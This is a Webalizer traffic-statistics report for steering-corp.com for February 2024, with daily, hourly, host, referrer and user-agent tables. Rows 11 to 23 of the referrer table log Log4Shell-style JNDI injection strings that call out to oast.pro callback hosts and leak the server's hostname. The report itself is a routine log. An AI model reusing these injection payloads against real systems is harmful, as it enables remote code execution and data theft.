Statistics for steering-corp.com

Summary Period: February 2024
Generated 01-Mar-2024 00:02 ICT


[Daily Statistics] [Hourly Statistics] [URLs] [Entry] [Exit] [Sites] [Referrers] [Search] [Agents]

Monthly Statistics for February 2024
Total Hits 34742
Total Files 31576
Total Pages 33826
Total Visits 1878
Total KBytes 7776
Total Unique Sites 627
Total Unique URLs 2
Total Unique Referrers 114
Total Unique User Agents 1101
. Avg Max
Hits per Hour 49 1335
Hits per Day 1198 3791
Files per Day 1088 3723
Pages per Day 1166 3743
Sites per Day 21 60
Visits per Day 64 151
KBytes per Day 268 919
Hits by Response Code
Code 200 - OK 90.89% 31576
Code 403 - Forbidden 0.67% 234
Code 404 - Not Found 8.44% 2932

Daily usage for February 2024

Daily Statistics for February 2024
Day Hits Files Pages Visits Sites KBytes
1 191 0.55% 154 0.49% 166 0.49% 52 2.77% 43 6.86% 13 0.17%
2 127 0.37% 107 0.34% 110 0.33% 38 2.02% 25 3.99% 5 0.07%
3 660 1.90% 140 0.44% 550 1.63% 58 3.09% 38 6.06% 116 1.49%
4 489 1.41% 168 0.53% 438 1.29% 58 3.09% 27 4.31% 83 1.07%
5 154 0.44% 124 0.39% 142 0.42% 50 2.66% 29 4.63% 10 0.12%
6 156 0.45% 126 0.40% 138 0.41% 48 2.56% 30 4.78% 8 0.10%
7 259 0.75% 160 0.51% 221 0.65% 60 3.19% 39 6.22% 32 0.41%
8 124 0.36% 108 0.34% 109 0.32% 39 2.08% 20 3.19% 5 0.07%
9 119 0.34% 88 0.28% 90 0.27% 33 1.76% 27 4.31% 8 0.11%
10 152 0.44% 128 0.41% 130 0.38% 44 2.34% 21 3.35% 8 0.10%
11 203 0.58% 160 0.51% 165 0.49% 47 2.50% 33 5.26% 22 0.28%
12 159 0.46% 129 0.41% 132 0.39% 50 2.66% 21 3.35% 11 0.14%
13 173 0.50% 130 0.41% 133 0.39% 47 2.50% 39 6.22% 14 0.19%
14 184 0.53% 153 0.48% 151 0.45% 49 2.61% 29 4.63% 18 0.23%
15 131 0.38% 105 0.33% 108 0.32% 38 2.02% 20 3.19% 7 0.09%
16 172 0.50% 145 0.46% 157 0.46% 51 2.72% 30 4.78% 14 0.19%
17 1303 3.75% 1240 3.93% 1246 3.68% 81 4.31% 46 7.34% 296 3.81%
18 1597 4.60% 1566 4.96% 1580 4.67% 114 6.07% 37 5.90% 368 4.74%
19 3420 9.84% 2163 6.85% 3386 10.01% 151 8.04% 48 7.66% 777 9.99%
20 2175 6.26% 2135 6.76% 2138 6.32% 93 4.95% 39 6.22% 518 6.66%
21 2348 6.76% 2318 7.34% 2334 6.90% 95 5.06% 41 6.54% 552 7.10%
22 2330 6.71% 2268 7.18% 2280 6.74% 82 4.37% 40 6.38% 554 7.13%
23 2370 6.82% 2339 7.41% 2341 6.92% 93 4.95% 43 6.86% 564 7.25%
24 2420 6.97% 2307 7.31% 2388 7.06% 87 4.63% 55 8.77% 574 7.39%
25 2326 6.70% 2310 7.32% 2314 6.84% 80 4.26% 35 5.58% 556 7.15%
26 2460 7.08% 2396 7.59% 2438 7.21% 93 4.95% 49 7.81% 587 7.55%
27 2362 6.80% 2335 7.39% 2344 6.93% 87 4.63% 41 6.54% 565 7.26%
28 2387 6.87% 2351 7.45% 2354 6.96% 81 4.31% 39 6.22% 571 7.34%
29 3791 10.91% 3723 11.79% 3743 11.07% 87 4.63% 60 9.57% 919 11.82%

Hourly usage for February 2024

Hourly Statistics for February 2024
Hour Hits Files Pages KBytes
Avg Total Avg Total Avg Total Avg Total
0 53 1558 4.48% 40 1163 3.68% 52 1508 4.46% 12 339 4.36%
1 42 1236 3.56% 41 1207 3.82% 41 1216 3.59% 9 273 3.51%
2 45 1324 3.81% 44 1280 4.05% 44 1283 3.79% 10 296 3.81%
3 44 1292 3.72% 42 1244 3.94% 43 1251 3.70% 10 297 3.81%
4 48 1400 4.03% 47 1370 4.34% 47 1373 4.06% 10 303 3.89%
5 46 1334 3.84% 43 1265 4.01% 44 1284 3.80% 11 305 3.93%
6 48 1401 4.03% 46 1355 4.29% 47 1376 4.07% 11 305 3.93%
7 45 1327 3.82% 44 1281 4.06% 44 1283 3.79% 11 312 4.02%
8 49 1448 4.17% 48 1412 4.47% 49 1424 4.21% 11 308 3.96%
9 44 1301 3.74% 43 1272 4.03% 43 1269 3.75% 11 307 3.94%
10 48 1405 4.04% 47 1365 4.32% 47 1369 4.05% 11 312 4.01%
11 47 1376 3.96% 45 1315 4.16% 46 1355 4.01% 11 315 4.05%
12 47 1373 3.95% 46 1341 4.25% 46 1342 3.97% 11 310 3.98%
13 47 1377 3.96% 46 1355 4.29% 46 1358 4.01% 11 308 3.97%
14 48 1396 4.02% 46 1345 4.26% 46 1355 4.01% 11 314 4.03%
15 48 1396 4.02% 46 1342 4.25% 46 1357 4.01% 11 320 4.11%
16 49 1433 4.12% 46 1355 4.29% 47 1372 4.06% 11 327 4.21%
17 92 2680 7.71% 48 1409 4.46% 90 2630 7.78% 20 581 7.48%
18 47 1376 3.96% 46 1343 4.25% 46 1349 3.99% 11 320 4.12%
19 58 1689 4.86% 49 1442 4.57% 54 1594 4.71% 13 366 4.71%
20 48 1394 4.01% 44 1301 4.12% 46 1356 4.01% 11 325 4.18%
21 54 1591 4.58% 47 1381 4.37% 53 1552 4.59% 11 332 4.26%
22 43 1254 3.61% 39 1137 3.60% 41 1216 3.59% 10 298 3.84%
23 47 1381 3.98% 44 1296 4.10% 46 1354 4.00% 10 302 3.88%

Top 2 of 2 Total URLs
# Hits KBytes URL
1 31565 90.86% 7114 91.48% /
2 11 0.03% 3 0.04% /.

Top 2 of 2 Total URLs By KBytes
# Hits KBytes URL
1 31565 90.86% 7114 91.48% /
2 11 0.03% 3 0.04% /.

Top 1 of 1 Total Entry Pages
# Hits Visits URL
1 31565 90.86% 1803 100.00% /

Top 1 of 1 Total Exit Pages
# Hits Visits URL
1 31565 90.86% 1800 100.00% /

Top 30 of 627 Total Sites
# Hits Files KBytes Visits Hostname
1 2402 6.91% 2402 7.61% 600 7.71% 42 2.24% 5.8.15.148
2 2400 6.91% 2400 7.60% 599 7.70% 50 2.66% 147.45.123.121
3 2399 6.91% 2399 7.60% 599 7.70% 49 2.61% 5.8.15.53
4 2382 6.86% 2382 7.54% 595 7.65% 43 2.29% 147.45.120.106
5 2374 6.83% 2374 7.52% 593 7.62% 38 2.02% 5.8.14.190
6 2356 6.78% 2356 7.46% 588 7.56% 50 2.66% 188.119.126.30
7 2356 6.78% 2356 7.46% 588 7.56% 38 2.02% 5.8.14.38
8 2352 6.77% 2352 7.45% 587 7.55% 42 2.24% 5.8.15.82
9 2351 6.77% 2351 7.45% 587 7.55% 37 1.97% 147.45.122.242
10 2309 6.65% 2309 7.31% 576 7.41% 46 2.45% 5.8.13.194
11 2308 6.64% 2308 7.31% 576 7.41% 51 2.72% 147.45.123.34
12 1809 5.21% 1809 5.73% 452 5.82% 5 0.27% 46.22.51.77
13 1441 4.15% 1441 4.56% 0 0.00% 309 16.45% 5.101.47.173
14 1234 3.55% 0 0.00% 263 3.39% 1 0.05% 168.63.49.56
15 867 2.50% 867 2.75% 0 0.00% 303 16.13% 152.228.218.191
16 802 2.31% 802 2.54% 0 0.00% 305 16.24% 185.170.10.187
17 793 2.28% 0 0.00% 169 2.18% 2 0.11% 137.220.197.141
18 198 0.57% 6 0.02% 41 0.53% 5 0.27% 216.244.66.234
19 77 0.22% 0 0.00% 17 0.22% 1 0.05% 185.198.240.154
20 50 0.14% 0 0.00% 11 0.14% 1 0.05% 15.235.145.161
21 47 0.14% 11 0.03% 12 0.15% 1 0.05% 185.14.194.150
22 42 0.12% 40 0.13% 10 0.13% 2 0.11% 175.27.212.157
23 38 0.11% 19 0.06% 9 0.11% 4 0.21% 162.55.85.228
24 27 0.08% 0 0.00% 5 0.07% 1 0.05% 20.168.120.23
25 21 0.06% 20 0.06% 5 0.07% 1 0.05% 106.58.212.52
26 21 0.06% 20 0.06% 5 0.07% 1 0.05% 118.195.130.163
27 21 0.06% 20 0.06% 5 0.07% 1 0.05% 125.88.229.99
28 21 0.06% 3 0.01% 5 0.07% 1 0.05% 178.128.126.83
29 21 0.06% 20 0.06% 5 0.07% 1 0.05% 182.43.31.128
30 21 0.06% 20 0.06% 5 0.07% 1 0.05% 182.43.79.24
View All Sites

Top 10 of 627 Total Sites By KBytes
# Hits Files KBytes Visits Hostname
1 2402 6.91% 2402 7.61% 600 7.71% 42 2.24% 5.8.15.148
2 2400 6.91% 2400 7.60% 599 7.70% 50 2.66% 147.45.123.121
3 2399 6.91% 2399 7.60% 599 7.70% 49 2.61% 5.8.15.53
4 2382 6.86% 2382 7.54% 595 7.65% 43 2.29% 147.45.120.106
5 2374 6.83% 2374 7.52% 593 7.62% 38 2.02% 5.8.14.190
6 2356 6.78% 2356 7.46% 588 7.56% 50 2.66% 188.119.126.30
7 2356 6.78% 2356 7.46% 588 7.56% 38 2.02% 5.8.14.38
8 2352 6.77% 2352 7.45% 587 7.55% 42 2.24% 5.8.15.82
9 2351 6.77% 2351 7.45% 587 7.55% 37 1.97% 147.45.122.242
10 2309 6.65% 2309 7.31% 576 7.41% 46 2.45% 5.8.13.194

Top 30 of 114 Total Referrers
# Hits Referrer
1 8974 25.83% https://top-chat24.ru/
2 8964 25.80% https://vavilon-service.ru/
3 8933 25.71% https://vestnik-podmoskovya.ru/
4 3639 10.47% - (Direct Request)
5 1555 4.48% https://jester-soft.ws/
6 1555 4.48% https://softbesplatno.net/
7 467 1.34% https://24top-chat.ru/
8 460 1.32% https://wmusor.ru/
9 15 0.04% www.google.com
10 14 0.04% binance.com
11 1 0.00% ${jndi:ldap://${:-793}${:-379}.${hostName}.referer.cmv7cjc3m87vv20b1vc06ooy7hdyguykh.oast.pro}
12 1 0.00% ${jndi:ldap://${:-793}${:-379}.${hostName}.referer.cmv7cjc3m87vv20b1vc07rpzrf94q8zi1.oast.pro}
13 1 0.00% ${jndi:ldap://${:-793}${:-379}.${hostName}.referer.cmv7cjc3m87vv20b1vc0aagmx46adxypz.oast.pro}
14 1 0.00% ${jndi:ldap://${:-793}${:-379}.${hostName}.referer.cmv7cjc3m87vv20b1vc0dtow7at7wyju5.oast.pro}
15 1 0.00% ${jndi:ldap://${:-793}${:-379}.${hostName}.referer.cmv7cjc3m87vv20b1vc0ndg8cgmzt5dxg.oast.pro}
16 1 0.00% ${jndi:ldap://${:-793}${:-379}.${hostName}.referer.cmv7cjc3m87vv20b1vc0yg1kdk4ahfgqy.oast.pro}
17 1 0.00% ${jndi:ldap://127.0.0.1#.${hostName}.referer.cmv7cjc3m87vv20b1vc06efytenx3xbwa.oast.pro}
18 1 0.00% ${jndi:ldap://127.0.0.1#.${hostName}.referer.cmv7cjc3m87vv20b1vc08d83a6pkye1b8.oast.pro}
19 1 0.00% ${jndi:ldap://127.0.0.1#.${hostName}.referer.cmv7cjc3m87vv20b1vc0ba5i1kanrrwae.oast.pro}
20 1 0.00% ${jndi:ldap://127.0.0.1#.${hostName}.referer.cmv7cjc3m87vv20b1vc0d55pbtohadbbo.oast.pro}
21 1 0.00% ${jndi:ldap://127.0.0.1#.${hostName}.referer.cmv7cjc3m87vv20b1vc0gzm75x8qii35y.oast.pro}
22 1 0.00% ${jndi:ldap://127.0.0.1#.${hostName}.referer.cmv7cjc3m87vv20b1vc0smodnp368cjqg.oast.pro}
23 1 0.00% ${jndi:ldap://127.0.0.1#.${hostName}.referer.cmv7cjc3m87vv20b1vc0yz44g1sbc4iq7.oast.pro}
24 1 0.00% https://imperya-sushi.ru/actions/bolshoj-novogodnij-rozygrysh\r
25 1 0.00% https://imperya-sushi.ru/actions/den-rojdenya#content\r
26 1 0.00% https://imperya-sushi.ru/actions/dostavka-sushi-za-40-min#content\r
27 1 0.00% https://imperya-sushi.ru/actions/roll-dnya#content\r
28 1 0.00% https://imperya-sushi.ru/barnaul/vse-sety/sety-do-1000-rublej#content\r
29 1 0.00% https://imperya-sushi.ru/blog/obshee/kak-prigotovit-rolly-v-domashnih-usloviyah-razbiraem-ves-process-ot-a-do-ya\r
30 1 0.00% https://imperya-sushi.ru/blog/obshee/proishozhdenie-nazvanij-rollov\r
View All Referrers

Top 15 of 1101 Total User Agents
# Hits User Agent
1 3110 8.95% Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
2 198 0.57% Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)
3 147 0.42% Apache-HttpClient/4.5.2 (Java/1.8.0_161)
4 110 0.32% Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
5 108 0.31% Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.1
6 102 0.29% Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 OPR/71.0.
7 100 0.29% Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)
8 95 0.27% Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.
9 91 0.26% ZoominfoBot (zoominfobot at zoominfo dot com)
10 90 0.26% Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36 OPR/68.0.
11 90 0.26% Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36
12 89 0.26% Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 OPR/73.0.
13 81 0.23% Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 OPR/74.0.
14 80 0.23% Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
15 80 0.23% Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)
View All User Agents


Generated by Webalizer Version 2.20
Quick Help